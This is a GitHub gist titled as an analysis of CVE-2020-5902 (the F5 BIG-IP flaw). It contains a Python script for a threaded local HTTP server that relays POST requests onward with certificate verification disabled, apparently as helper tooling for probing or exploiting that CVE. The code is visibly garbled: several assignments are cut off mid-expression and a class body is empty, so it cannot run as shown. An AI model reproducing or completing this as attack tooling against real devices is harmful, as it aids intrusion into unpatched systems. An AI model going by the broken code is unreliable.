Skip to content

Instantly share code, notes, and snippets.


qkta/ Secret

Created Jul 12, 2020
What would you like to do?
analysis cve-2020-5902
import requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from cgi import parse_header, parse_multipart
from urllib.parse import parse_qs
from socketserver import ThreadingMixIn
class ProxyHTTPRequestHandler(BaseHTTPRequestHandler):
protocol_version = 'HTTP/1.0'
proxies = {'http': '', 'https': ''}
def do_POST(self):
length = int(self.headers['content-length'])
postvars =
req_headers = self.parse_headers()
resp ="{}".format(self.path), data=postvars,
headers=req_headers, verify=False, proxies=self.proxies)
self.send_header('Content-Length', len(resp.content))
def parse_headers(self):
req_header = {}
for line in self.headers:
line_parts = [o.strip() for o in line.split(':', 1)]
if len(line_parts) == 2:
req_header[line_parts[0]] = line_parts[1]
return req_header
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
if __name__ == '__main__':
server_address = ('', 5000)
httpd = ThreadedHTTPServer(server_address, ProxyHTTPRequestHandler)
print('http server is running')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment